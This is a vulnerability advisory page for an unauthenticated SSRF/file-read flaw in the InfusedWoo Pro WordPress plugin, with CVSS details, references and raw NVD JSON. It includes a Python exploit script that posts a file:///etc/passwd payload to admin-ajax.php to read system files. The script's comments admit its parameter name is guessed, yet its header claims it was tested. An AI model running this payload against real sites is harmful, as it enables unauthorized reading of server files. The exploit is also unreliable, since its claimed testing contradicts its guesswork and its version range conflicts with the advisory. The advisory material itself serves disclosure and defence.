CVE-2026-6514

Description

The InfusedWoo Pro plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 5.1.2 via the popup_submit. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

InfusedWoo Pro <= 5.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: InfusedWoo Pro < 5.1.2 - Arbitrary File Read (SSRF)
# Date: 2026-05-14
# Exploit Author: Analyst
# Vendor Homepage: https://infusedwoo.com/
# Software Link: https://downloads.infusedwoo.com/updater/iw5.php?changelog
# Version: <= 5.1.2
# Tested on: WordPress 6.x

target_url = "http://example.com/wp-admin/admin-ajax.php"

# The vulnerable action is 'popup_submit'
# Attack vector: reading /etc/passwd via file wrapper
data = {
    "action": "popup_submit",
    # Parameter name might vary based on plugin implementation, assuming 'file' or 'url'
    "file": "file:///etc/passwd" 
}

try:
    response = requests.post(target_url, data=data)
    if response.status_code == 200:
        print("[+] Exploit successful! Response below:")
        print(response.text)
    else:
        print("[-] Exploit failed, status code:", response.status_code)
except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6514
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6514
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6514/
[4] VulDB https://vuldb.com/cve/CVE-2026-6514
[5] https://downloads.infusedwoo.com/updater/iw5.php?changelog
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/76b75e61-e7f8-41cc-ab4f-e6ca42d68308?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6514", "sourceIdentifier": "[email protected]", "published": "2026-05-14T09:16:28.023", "lastModified": "2026-05-14T14:28:41.283", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The InfusedWoo Pro plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 5.1.2 via the popup_submit. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://downloads.infusedwoo.com/updater/iw5.php?changelog", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/76b75e61-e7f8-41cc-ab4f-e6ca42d68308?source=cve", "source": "[email protected]"}]}}